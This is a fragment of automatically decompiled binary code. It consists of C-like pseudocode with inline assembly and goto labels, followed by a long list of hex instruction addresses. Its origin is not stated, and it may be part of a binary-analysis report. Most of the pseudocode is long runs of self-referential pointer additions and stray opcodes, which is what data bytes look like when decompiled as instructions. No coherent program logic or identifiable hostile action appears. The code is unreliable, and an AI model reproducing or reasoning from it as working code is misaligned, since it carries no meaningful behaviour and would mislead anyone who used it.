									 *(_t1255 + 0x6e) =  *(_t1255 + 0x6e) & _t1255;
									 *(_t1339 + 0x53 + _t1255 * 2) =  *(_t1339 + 0x53 + _t1255 * 2) & 0x21cd4c01;
									 *(_t1377 + 0x6f) =  *(_t1377 + 0x6f) & _t1255;
									_t627 = 0x21ed4e0d;
									 *0x21cd4c01 =  *0x21cd4c01 + 0x21ed4e0d;
									 *0x21cd4c01 =  *0x21cd4c01 + 0x21ed4e0d;
									 *0x21cd4c01 =  *0x21cd4c01 + 0x21ed4e0d;
									_push(0x21cd4c01);
									_t1377 = _t1377 + 1;
									__eflags = _t1377;
									goto L78;
								}
							}
						}
						_t629 =  &(( &(_t627[ *_t627]))[1]);
						__eflags =  *_t629 & _t629;
						 *_t629 =  *_t629 + _t1306;
						 *_t629 =  *_t629 + _t629;
						asm("adc [eax], al");
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t1306;
						 *_t629 =  *_t629 + _t629;
						asm("adc [eax], al");
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t1306;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t1177;
						_t1364 =  &(_t1363[0]);
						 *_t629 =  *_t629 + _t629;
						_push(_t1177);
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						asm("pushad");
						 *_t629 =  *_t629 + _t629;
						_t631 = _t629 +  *_t629;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631 + _t631;
						 *_t631 =  *_t631;
						_t632 = _t631;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 | _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 + _t632;
						 *_t632 =  *_t632 | _t632;
						 *_t632 =  *_t632 + _t632;
						_t633 = _t632 - 1;
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						 *_t1364 =  *_t1364 + _t1255;
						__eflags =  *_t1364;
						if(__eflags == 0) {
							L86:
							 *_t633 =  *_t633 + _t633;
							 *_t633 =  *_t633 + _t633;
							 *_t633 =  *_t633 + _t633;
							 *_t633 =  *_t633 + _t633;
							 *_t633 =  *_t633 + _t633;
							 *_t633 =  *_t633 + _t633;
							_t633 = _t633 + 1;
							 *_t633 =  *_t633 + _t633;
							_t1306 = _t1306 + 1;
							 *_t633 =  *_t633 + _t633;
							__eflags =  *_t633;
							goto L87;
						} else {
							if(__eflags < 0) {
								L87:
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								_t105 = _t633 + 0x46;
								 *_t105 =  *(_t633 + 0x46) + _t1306;
								__eflags =  *_t105;
							} else {
								 *_t633 =  *_t633 + _t633;
								_t1364[0x8000000] = _t1364[0x8000000] + _t1306;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t1255;
								 *_t633 =  *_t633 + _t633;
								 *_t1306 =  *_t1306 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 + _t633;
								 *_t633 =  *_t633 & _t633;
								_t93 = _t633 + 0x2e;
								 *_t93 =  *(_t633 + 0x2e) + _t633;
								__eflags =  *_t93;
								if(__eflags < 0) {
									L90:
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									 *_t633 =  *_t633 + _t633;
									__eflags =  *_t633;
									goto L91;
								} else {
									if(__eflags < 0) {
										_t634 = _t633 - 1;
										 *_t634 =  *_t634 + _t634;
										 *_t1306 =  *_t1306 + _t634;
										 *0x306000 =  *0x306000 + _t634;
										_t633 = _t634 + _t1177;
										asm("adc eax, 0x10000");
										goto L90;
									} else {
										 *_t633 =  *_t633 + _t633;
										 *((intOrPtr*)(_t633 + 2)) =  *((intOrPtr*)(_t633 + 2)) + _t1177;
										asm("pushad");
										 *_t633 =  *_t633 + _t633;
										 *((intOrPtr*)(_t633 + _t633)) =  *((intOrPtr*)(_t633 + _t633)) + _t633;
										 *_t633 =  *_t633 + _t633;
										_t633 = _t633 -  *_t633;
										 *_t633 =  *_t633 + _t633;
										 *_t633 =  *_t633 + _t633;
										 *_t633 =  *_t633 + _t633;
										 *_t633 =  *_t633 + _t633;
										 *_t633 =  *_t633 + _t633;
										 *_t633 =  *_t633 + _t633;
										 *_t633 =  *_t633 + _t633;
										_t99 = _t633 + 0x2e;
										 *_t99 =  *(_t633 + 0x2e) + _t633;
										__eflags =  *_t99;
										if( *_t99 < 0) {
											L91:
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t633 =  *_t633 + _t633;
											__eflags =  *_t633;
										} else {
											asm("insb");
											asm("outsd");
											asm("arpl [eax], ax");
											 *((intOrPtr*)(_t633 + _t633)) =  *((intOrPtr*)(_t633 + _t633)) + _t1255;
											 *_t633 =  *_t633 + _t633;
											 *((intOrPtr*)(_t633 + 0x2000000)) =  *((intOrPtr*)(_t633 + 0x2000000)) + _t633;
											 *_t633 =  *_t633 + _t633;
											 *_t1364 =  *_t1364 + _t1255;
											 *_t633 =  *_t633 + _t633;
											__eflags =  *_t633;
											goto L86;
										}
									}
								}
							}
						}
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						 *_t633 =  *_t633 + _t633;
						asm("adc esi, [eax]");
						_push(es);
						 *((intOrPtr*)(_t633 + _t633 + 0x10000)) =  *((intOrPtr*)(_t633 + _t633 + 0x10000)) + _t1177;
						 *_t1255 =  *_t1255 + _t1306;
						_t1307 = _t1306 +  *((intOrPtr*)(3 + _t1177));
						 *_t633 =  *_t633 + _t633;
						_t1256 = _t1255 |  *_t1307;
						__eflags = _t1256;
						if(_t1256 < 0) {
							 *_t633 =  *_t633 + _t633;
							_push(es);
							_push(ss);
							_push(0x16);
							asm("outsd");
							_t633 = _t633 |  *_t1364;
							 *_t1307 =  *_t1307 + _t1256;
							__eflags =  *_t1307;
							if( *_t1307 < 0) {
								 *_t633 =  *_t633 + _t633;
								_t1256 = _t1256 |  *(_t1177 + _t1177);
								__eflags = _t1256;
							}
						}
						 *_t633 =  *_t633 + _t633;
						 *0x1b160906 =  *0x1b160906 + _t1256;
						asm("outsd");
						_push(es);
						 *_t633 =  *_t633 + _t633;
						_t1178 = _t1177 |  *_t1177;
						__eflags = _t1178;
						_push(es);
						if(_t1178 < 0) {
							 *_t633 =  *_t633 + _t633;
							_t1178 = _t1178 |  *(_t1307 + 0x16);
							__eflags = _t1178;
							_push(0x13);
						}
						_t635 = _t633 + 0x16;
						asm("adc eax, [0x6f062a2b]");
						 *_t635 =  *_t635 | _t635;
						 *_t1307 =  *_t1307 + _t1256;
						__eflags =  *_t1307;
						asm("adc eax, [esi]");
						asm("adc [esi], eax");
						_push(ss);
						asm("das");
						_push(es);
						if( *_t1307 < 0) {
							 *_t635 =  *_t635 + _t635;
							_t1178 = _t1178 |  *(_t1307 + 0x11);
							_t635 = _t635 + 0x11;
							__eflags = _t635;
						}
						_push(es);
						_t1364[7] = _t1364[7] >> _t1256;
						asm("adc [0x5f3f1f5a], eax");
						asm("bound esp, [eax+0x13]");
						_t637 = _t635 + 0x5135828;
						asm("adc [0x7d1321e], eax");
						 *(_t1339 + 0x1d) =  *(_t1339 + 0x1d) | _t1377;
						 *_t637 =  *_t637 + _t637;
						_push(es);
						asm("outsd");
						 *_t637 =  *_t637 | _t637;
						 *_t1307 =  *_t1307 + _t1256;
						asm("outsd");
						_t638 = _t637 |  *_t637;
						 *_t1307 =  *_t1307 + _t1256;
						_t1257 = es;
						asm("adc eax, [edi]");
						es = es;
						 *_t1257 =  *_t1257 | _t1307;
						es = es;
						asm("adc [esp+edx], eax");
						asm("outsd");
						asm("sbb al, 0x0");
						 *_t1364 =  *_t1364 + _t638;
						 *(_t1339 + 0xb) =  *(_t1339 + 0xb) | _t1257;
						 *_t638 =  *_t638 + _t638;
						_t1308 = _t1307 |  *_t1178;
						 *_t1257 =  *_t1257 | _t1308;
						 *_t1308 =  *_t1308 | _t1257;
						__eflags =  *_t1308;
						asm("o16 add al, [ebx]");
						if( *_t1308 < 0) {
							 *_t638 =  *_t638 + _t638;
							__eflags =  *_t638;
						}
						_t639 = _t638 + 2;
						_pop(ss);
						_t1179 = _t1178 +  *_t1339;
						__eflags = _t1179;
						_pop(ds);
						asm("bound ecx, [ebp+0x2000005]");
						if(_t1179 < 0) {
							 *_t639 =  &(_t639[ *_t639]);
							__eflags =  *_t639;
						}
						 *((intOrPtr*)(_t1308 + _t1377)) =  *((intOrPtr*)(_t1308 + _t1377)) + _t639;
						 *_t639 =  &(_t639[ *_t639]);
						asm("adc esi, [eax]");
						_t641 = _t639 -  *_t639;
						 *_t641 =  *_t641 + _t641;
						_t642 = _t641 +  *_t641;
						 *_t1257 =  *_t1257 + _t1308;
						_pop(ss);
						_t1258 = _t1257 |  *_t1179;
						 *_t642 =  *_t642 + _t642;
						asm("loopne 0xffffff91");
						 *_t1364 =  *_t1364 + (_t642 + 0x28020006 |  *(_t642 + 0x28020006));
						ss = es;
						_t646 = ss;
						_t647 = _t646 |  *_t1364;
						asm("outsb");
						_pop(ss);
						_t1181 = _t1179 + _t1179[0] +  *((intOrPtr*)(_t1179 + _t1179[0] + 2));
						 *_t647 =  *_t647 + _t647;
						_t648 = _t647 + 0x1f;
						_pop(ds);
						_pop(_t1341);
						asm("bound ebp, [edx+0x32]");
						asm("fisubr dword [edx]");
						 *_t1181 =  *_t1181 + _t1308;
						 *(_t648 + _t648) =  *(_t648 + _t648) ^ _t648;
						__eflags =  *_t648 - _t648;
						 *_t648 =  *_t648 + _t648;
						 *_t1258 =  *_t1258 + _t1308;
						_pop(ss);
						_t650 = _t648 +  *_t648 |  *_t1308;
						__eflags = _t650;
						if(_t650 == 0) {
							 *_t650 =  *_t650 + _t650;
							__eflags =  *_t650;
						}
						_t651 = _t650 + 0xb;
						_t1182 = _t1181 -  *((intOrPtr*)(_t1364 + _t651));
						__eflags = _t1182;
						_pop(ss);
						asm("bound eax, [edx]");
						if(_t1182 == 0) {
							 *_t651 =  &(_t651[ *_t651]);
							__eflags =  *_t651;
						}
						 *((intOrPtr*)(_t1364 + _t651)) =  *((intOrPtr*)(_t1364 + _t651)) + _t651;
						asm("loopne 0xffffff91");
						_t652 =  &(_t651[0x3020000]);
						_t652[_t652] = _t652[_t652] - _t1258;
						 *_t1364 =  &(_t652[ *_t1364]);
						_pop(_t653);
						_pop(ss);
						_pop(_t1259);
						_t656 = (_t653 |  *_t1341 |  *_t1341) ^ (_t653 |  *_t1341 |  *_t1341);
						ss = es;
						_t1183 = _t1182 +  *((intOrPtr*)(_t1182 + 2));
						 *_t656 =  *_t656 + _t656;
						_t657 = _t656 + 0x1f;
						ds = ss;
						asm("bound ebx, [ecx+0x2a]");
						 *_t657 =  *_t657 + _t657;
						 *_t1183 =  *_t1183 + _t1308;
						 *(_t657 + _t657) =  *(_t657 + _t657) ^ _t657;
						__eflags = _t657;
						 *_t657 =  *_t657 + _t657;
						 *_t1259 =  *_t1259 + _t1308;
						_pop(ss);
						_t1310 = _t1308 |  *_t1364 |  *_t1364;
						_t659 = _t657 | 0x0000002b;
						 *_t1310 =  *_t1310 - _t659;
						__eflags =  *_t1310;
						if( *_t1310 == 0) {
							 *_t659 =  *_t659 + _t659;
							__eflags =  *_t659;
						}
						 *((intOrPtr*)(_t1364 + _t659)) =  *((intOrPtr*)(_t1364 + _t659)) + _t659;
						asm("loopne 0xffffff91");
						_t660 = _t659 + 0x3020000;
						 *((intOrPtr*)(_t660 + _t660)) =  *((intOrPtr*)(_t660 + _t660)) - _t1259;
						 *_t1364 =  *_t1364 + _t660;
						_t661 = _t660 | 0x0a621706;
						 *(_t661 + 0xa) =  *(_t661 + 0xa) | _t1183;
						es = es;
						 *_t661 =  *_t661 | _t1259;
						_pop(ds);
						_pop(ds);
						_pop(_t1343);
						asm("bound esp, [eax+0xb]");
						 *_t1343 =  *_t1343 | _t1310;
						_pop(_t662);
						_t663 = _t662 | 0x00000008;
						_t1184 = _t1183 +  *((intOrPtr*)(_t1183 + 2));
						 *_t663 =  *_t663 + _t663;
						_t664 = _t663 + 0x32;
						asm("into");
						_pop(es);
						_t1311 = _t1310 -  *_t1184;
						 *(_t664 + _t664) =  *(_t664 + _t664) ^ _t664;
						 *(_t664 ^ 0x00000000) =  *(_t664 ^ 0x00000000) + (_t664 ^ 0x00000000);
						 *_t1259 =  *_t1259 + _t1311;
						_pop(ss);
						_t1313 = _t1311 |  *_t1364 |  *_t1364;
						_t669 = es;
						asm("loopne 0xffffff91");
						_t670 = _t669 + 0x4020000;
						 *((intOrPtr*)(_t670 + _t670)) =  *((intOrPtr*)(_t670 + _t670)) - _t1259;
						 *_t1364 =  *_t1364 + _t670;
						_t671 = _t670 | 0x0a621706;
						 *(_t671 + 0xa) =  *(_t671 + 0xa) | _t1184;
						es = es;
						 *_t671 =  *_t671 | _t1259;
						_pop(ds);
						_pop(ds);
						_pop(_t1344);
						asm("bound esp, [eax+0xb]");
						 *_t1344 =  *_t1344 | _t1313;
						_pop(_t672);
						asm("adc esi, [eax]");
						_t675 = (_t672 | 0x00000008) + 0x2a07d632 +  *((intOrPtr*)((_t672 | 0x00000008) + 0x2a07d632));
						__eflags = _t675 - 0x5000000;
						 *_t675 =  *_t675 + _t675;
						asm("adc [edx], eax");
						 *_t675 =  *_t675 + _t675;
						_t676 = _t675 + 2;
						__eflags = _t676;
						_push(ss);
						if(__eflags < 0) {
							 *_t676 =  *_t676 + _t676;
							_t676 = _t676 + 2;
							asm("adc eax, 0x47d");
						}
						if(__eflags < 0) {
							 *_t676 =  *_t676 + _t676;
							_t676 = _t676 + 0x16;
							__eflags = _t676;
						}
						_t1260 = _t1259 |  *_t1184;
						_pop(ds);
						_t677 = _t676 +  *_t1313;
						__eflags = _t677;
						if(_t677 == 0) {
							 *_t677 =  *_t677 + _t677;
							_t677 = _t677 + 0x1e;
							asm("bound eax, [edx]");
						}
						_t1185 = _t1184 +  *((intOrPtr*)(_t1184 + 6));
						__eflags = _t1185;
					} else {
						 *_t589 =  *_t589 + _t589;
						asm("adc eax, 0x2a060000");
						__eflags = 0xffffffffffffffff;
						asm("adc al, 0xfe");
						_push(es);
						return _t589 + 0x6f;
					}
				}
				L371:
			}

0x0056410e
0x0056410e
0x0056410e
0x0056410e
0x0056410e
0x0056410e
0x0056410e
0x0056410f
0x0056410a
0x0056410a
0x0056410b
0x00564111
0x00564111
0x00564111
0x00564112
0x00564114
0x00564116
0x00564117
0x00564119
0x0056411b
0x0056411d
0x0056411d
0x0056411d
0x00564120
0x00564121
0x00564121
0x00564123
0x00564125
0x00564127
0x00564129
0x0056412a
0x0056412a
0x0056412f
0x00000000
0x00000000
0x00564131
0x005640d3
0x00564133
0x00564133
0x00564133
0x00564135
0x00564137
0x00564138
0x00564139
0x0056413c
0x0056413e
0x0056413f
0x00564141
0x00564143
0x00564145
0x00564147
0x00564148
0x0056414a
0x0056414b
0x0056414b
0x0056414b
0x0056414e
0x0056414e
0x00564150
0x00564152
0x00564153
0x00564153
0x00564155
0x005640f8
0x005640fa
0x005640fd
0x005640fe
0x00564100
0x00564102
0x00564103
0x00000000
0x00564105
0x00564105
0x00564107
0x00564109
0x00000000
0x00564109
0x00564158
0x00564158
0x0056415a
0x0056415c
0x0056415d
0x0056415e
0x00564161
0x00564163
0x00564164
0x0056416a
0x0056416b
0x0056416b
0x0056416d
0x0056416d
0x0056416d
0x0056416d
0x00000000
0x0056416d
0x00564155
0x00000000
0x00564131
0x0056416f
0x00564171
0x00564173
0x00564179
0x0056417c
0x0056417d
0x0056417f
0x00564183
0x00564188
0x0056418a
0x0056418b
0x00564190
0x00564191
0x00564193
0x00564195
0x00564196
0x00564198
0x0056419a
0x0056419b
0x0056419c
0x005641a1
0x005641a3
0x005641a4
0x005641a6
0x005641ac
0x005641ae
0x005641b0
0x005641b0
0x005641b1
0x005641b3
0x005641b4
0x005641b7
0x005641b8
0x00000000
0x00000000
0x005641ba
0x005641bc
0x005641bd
0x005641c0
0x005641c2
0x005641c2
0x005641c4
0x00564219
0x0056421c
0x0056421d
0x0056421e
0x00564221
0x00564229
0x0056422f
0x00564235
0x00564237
0x0056423c
0x0056423e
0x0056423f
0x00564240
0x00564240
0x00564242
0x00564242
0x00564243
0x00564245
0x00564246
0x0056424a
0x0056424c
0x00564254
0x00564256
0x00564259
0x0056425b
0x0056425e
0x00564264
0x0056426a
0x0056426d
0x0056426e
0x00564270
0x00564271
0x00564278
0x00564279
0x0056427a
0x00564280
0x00564282
0x00564284
0x00564286
0x00564288
0x00564289
0x0056428b
0x0056428d
0x0056428f
0x00564291
0x00564292
0x00564294
0x00564295
0x00564297
0x00564299
0x0056429b
0x0056429d
0x0056429f
0x005642a1
0x005642a3
0x005642a5
0x005642a7
0x005642a9
0x005642a9
0x005642a9
0x005642ad
0x005642af
0x005642b1
0x005642b1
0x005642b6
0x005642b8
0x005642ba
0x005642bc
0x005642bd
0x005642bf
0x005642c1
0x005642c3
0x005642c5
0x005642c7
0x005642ca
0x005642cc
0x005642cf
0x005642d1
0x005642d3
0x005642d4
0x005642d6
0x005642d6
0x005642d8
0x005642d8
0x005642da
0x005642dc
0x005642de
0x005642e3
0x005642e5
0x005642e6
0x005642e9
0x005642eb
0x005642ed
0x005642ee
0x005642f0
0x005642f2
0x005642f3
0x005642f4
0x005642f6
0x005642f8
0x005642f9
0x005642fb
0x005642fd
0x00564302
0x00564304
0x00564306
0x00564308
0x00564308
0x0056430a
0x0056430b
0x00564311
0x00564311
0x00564313
0x00564315
0x00564316
0x00564318
0x00564318
0x00564318
0x0056431a
0x00564323
0x00564325
0x0056432a
0x0056432c
0x0056432e
0x0056432f
0x00564332
0x00564336
0x0056433b
0x0056433d
0x0056433d
0x0056433f
0x0056433f
0x00564347
0x00564348
0x0056434a
0x0056434c
0x0056434d
0x00564358
0x0056435a
0x0056435c
0x0056435e
0x00564360
0x00564364
0x00564366
0x00564366
0x00564368
0x0056436a
0x0056436c
0x0056436e
0x00564370
0x00564372
0x00564374
0x00564375
0x0056437b
0x0056437d
0x0056437f
0x00564381
0x00564386
0x00564388
0x0056438a
0x0056438b
0x0056438d
0x0056438e
0x00564394
0x00564395
0x00564397
0x00564399
0x00564399
0x00564399
0x0056439b
0x0056439c
0x0056439c
0x0056439f
0x005643a1
0x005643a4
0x005643aa
0x005643ac
0x005643ae
0x005643af
0x005643b1
0x005643b2
0x005643b3
0x005643b4
0x005643ba
0x005643bc
0x005643bd
0x005643bf
0x005643c3
0x005643c5
0x005643c7
0x005643cd
0x005643cf
0x005643d1
0x005643d4
0x005643d6
0x005643d8
0x005643de
0x005643e1
0x005643e1
0x005643e2
0x005643e2
0x005643e3
0x005643e5
0x005643e7
0x005643e9
0x005643ef
0x005643f1
0x005643f3
0x005643f4
0x005643f6
0x005643f7
0x005643fd
0x005643fe
0x00564400
0x00564402
0x00564404
0x00564406
0x00564406
0x00564408
0x00000000
0x00000000
0x0056440a
0x00564410
0x00564412
0x00564414
0x00564419
0x0056441d
0x0056441e
0x0056441f
0x00564421
0x00564423
0x00564425
0x00564428
0x0056442a
0x00564430
0x00564432
0x00564434
0x00564435
0x00564437
0x00564439
0x00564439
0x0056443b
0x0056443f
0x00564440
0x00000000
0x00564442
0x00564442
0x00564444
0x00564447
0x00564448
0x0056444a
0x0056444b
0x0056444d
0x00564453
0x00564454
0x00564456
0x00564458
0x0056445a
0x0056445a
0x00000000
0x00564440
0x0056445c
0x0056445e
0x0056445f
0x00564460
0x00564462
0x00564464
0x00564466
0x0056446c
0x00564474
0x0056447b
0x0056447d
0x0056447f
0x00564481
0x00564482
0x00564484
0x00564486
0x00564489
0x0056448d
0x0056448f
0x00564492
0x00564496
0x00564499
0x0056449e
0x0056449f
0x005644a0
0x005644a6
0x005644a8
0x005644aa
0x005644ad
0x005644af
0x005644b2
0x005644b5
0x005644b7
0x005644b9
0x005644bb
0x005644bd
0x005644bf
0x005644c2
0x005644c4
0x005644c5
0x005644c7
0x005644c9
0x005644cb
0x005644cd
0x005644cf
0x005644d1
0x005644d3
0x005644d5
0x005644d7
0x005644d9
0x005644db
0x005644de
0x005644e0
0x005644e1
0x005644e3
0x005644e5
0x005644e9
0x005644eb
0x005644f0
0x005644f4
0x005644f6
0x005644f7
0x005644f9
0x005644fb
0x005644fd
0x005644ff
0x00564501
0x00564503
0x00564505
0x0056450c
0x0056450e
0x00564510
0x00564513
0x00564515
0x00564517
0x00564519
0x0056451b
0x0056451d
0x0056451f
0x00564522
0x00564524
0x00564526
0x0056452a
0x0056452c
0x0056452f
0x00564531
0x00564533
0x00564535
0x00564536
0x0056453c
0x0056453e
0x00564540
0x00564543
0x00564546
0x00564548
0x00564549
0x0056454c
0x0056454e
0x00564550
0x00564550
0x00564551
0x00564553
0x00564553
0x00564553
0x00564557
0x005645cd
0x00000000
0x00000000
0x00000000
0x00000000
0x00564559
0x00564559
0x0056455b
0x0056455d
0x005645cf
0x005645cf
0x005645d2
0x00000000
0x00564560
0x00564560
0x005645d4
0x005645d4
0x00000000
0x005645d6
0x005645d6
0x00000000
0x005645d8
0x005645d8
0x00000000
0x005645d8
0x005645d6
0x00564562
0x00564562
0x00564565
0x00564567
0x005645d9
0x005645d9
0x005645db
0x00000000
0x00000000
0x00000000
0x00000000
0x0056456a
0x0056456a
0x005645de
0x005645de
0x005645e0
0x005645e3
0x005645e6
0x005645e6
0x005645e6
0x005645e8
0x005645ea
0x005645ec
0x005645ec
0x00000000
0x005645ec
0x0056456c
0x0056456c
0x0056456f
0x00564571
0x005645a1
0x005645a1
0x005645a4
0x00564575
0x00564575
0x00564578
0x0056457b
0x0056457c
0x0056457c
0x00564583
0x005645ee
0x005645ee
0x005645f0
0x005645f4
0x005645f5
0x005645f6
0x005645f7
0x005645f8
0x00000000
0x00564585
0x00564585
0x00564586
0x00564587
0x0056458c
0x0056458e
0x00564591
0x00564591
0x00564592
0x00564600
0x00564600
0x00564605
0x00564605
0x00564607
0x00564609
0x00564609
0x00000000
0x00564594
0x00564594
0x0056460b
0x0056460b
0x0056460d
0x0056460e
0x00564611
0x00564612
0x00564615
0x00564617
0x00564619
0x0056461a
0x0056461b
0x0056461f
0x00564625
0x00564627
0x00564629
0x00564629
0x0056462c
0x0056462e
0x00564630
0x00564633
0x00564635
0x00564637
0x00564637
0x00564638
0x00564638
0x0056463c
0x0056463e
0x00564640
0x00564640
0x00564641
0x00564641
0x00564642
0x00564642
0x00564644
0x00564644
0x00564646
0x00564648
0x0056464a
0x0056464c
0x0056464c
0x0056464d
0x0056464d
0x0056464f
0x00564651
0x00564651
0x00564596
0x00564596
0x005645fd
0x005645fd
0x00000000
0x00564598
0x00564598
0x0056459d
0x00000000
0x0056459f
0x0056459f
0x005645a0
0x005645a0
0x00000000
0x005645a0
0x0056459d
0x00564596
0x00564594
0x00564592
0x00564583
0x00564571
0x0056456a
0x00564567
0x00564560
0x0056455d
0x00564652
0x00564654
0x00564656
0x00564658
0x0056465a
0x0056465c
0x0056465e
0x00564660
0x00564662
0x00564664
0x00564664
0x00564664
0x0056466a
0x0056466b
0x00564670
0x00564672
0x00564677
0x00564678
0x0056467d
0x005646ee
0x005646ee
0x005646f0
0x005646f3
0x005646f5
0x005646f7
0x005646f9
0x005646ff
0x00564701
0x00564703
0x00564703
0x0056467f
0x0056467f
0x00564682
0x00564683
0x00564683
0x00564683
0x00564686
0x00564687
0x00564688
0x00564689
0x005646ab
0x005646ab
0x005646ad
0x005646ae
0x005646b0
0x005646b3
0x005646b4
0x005646b5
0x005646b7
0x005646b9
0x005646bb
0x005646bd
0x005646c1
0x005646c3
0x005646c5
0x005646c7
0x005646c9
0x005646cb
0x005646cd
0x005646cf
0x005646d1
0x005646d4
0x005646d6
0x005646d8
0x005646da
0x005646db
0x005646dd
0x005646df
0x005646e0
0x005646e2
0x005646e4
0x005646e6
0x005646e8
0x005646eb
0x005646ed
0x005646ed
0x00000000
0x0056468b
0x0056468b
0x0056468e
0x00564690
0x00564691
0x00564694
0x00564698
0x0056469b
0x005646a3
0x005646a5
0x005646a7
0x005646a9
0x005646aa
0x005646aa
0x00000000
0x005646aa
0x0056468e
0x00564689
0x00564707
0x00564708
0x0056470a
0x0056470c
0x0056470e
0x00564710
0x00564712
0x00564714
0x00564716
0x00564718
0x0056471a
0x0056471c
0x0056471e
0x00564720
0x00564722
0x00564724
0x00564726
0x00564728
0x0056472a
0x0056472b
0x0056472d
0x0056472e
0x00564730
0x00564732
0x00564733
0x00564736
0x00564738
0x0056473a
0x0056473c
0x0056473e
0x00564740
0x00564742
0x00564744
0x00564746
0x00564748
0x0056474a
0x0056474d
0x0056474f
0x00564751
0x00564753
0x00564755
0x00564757
0x00564759
0x0056475b
0x0056475d
0x0056475f
0x00564761
0x00564763
0x00564765
0x00564767
0x00564769
0x0056476b
0x0056476d
0x0056476f
0x00564771
0x00564773
0x00564775
0x00564777
0x00564779
0x0056477b
0x0056477d
0x0056477f
0x00564781
0x00564783
0x00564785
0x00564787
0x00564789
0x0056478b
0x0056478d
0x0056478f
0x00564791
0x00564793
0x00564795
0x00564796
0x00564798
0x0056479a
0x0056479c
0x0056479e
0x005647a0
0x005647a0
0x005647a2
0x00564809
0x00564809
0x0056480b
0x0056480d
0x0056480f
0x00564811
0x00564813
0x00564815
0x00564816
0x00564818
0x00564819
0x00564819
0x00000000
0x005647a4
0x005647a4
0x0056481a
0x0056481a
0x0056481c
0x0056481e
0x00564820
0x00564822
0x00564824
0x00564826
0x00564828
0x00564828
0x00564828
0x005647a6
0x005647a6
0x005647a8
0x005647af
0x005647b1
0x005647b3
0x005647b5
0x005647b7
0x005647b9
0x005647bb
0x005647bd
0x005647bf
0x005647c1
0x005647c3
0x005647c5
0x005647c7
0x005647c7
0x005647c7
0x005647ca
0x0056483f
0x0056483f
0x00564841
0x00564843
0x00564845
0x00564847
0x00564849
0x0056484b
0x0056484d
0x0056484f
0x00564851
0x00564853
0x00564855
0x00564857
0x00564857
0x00000000
0x005647cc
0x005647cc
0x00564831
0x00564832
0x00564834
0x00564836
0x0056483c
0x0056483e
0x00000000
0x005647ce
0x005647ce
0x005647d0
0x005647d6
0x005647d7
0x005647d9
0x005647dc
0x005647de
0x005647e0
0x005647e2
0x005647e4
0x005647e6
0x005647e8
0x005647ea
0x005647ec
0x005647ef
0x005647ef
0x005647ef
0x005647f2
0x00564859
0x00564859
0x0056485b
0x0056485d
0x0056485f
0x00564861
0x00564863
0x00564865
0x00564867
0x00564869
0x0056486b
0x0056486d
0x0056486f
0x0056486f
0x005647f4
0x005647f4
0x005647f5
0x005647f6
0x005647f8
0x005647fb
0x005647fd
0x00564803
0x00564805
0x00564807
0x00564807
0x00000000
0x00564807
0x005647f2
0x005647cc
0x005647ca
0x005647a4
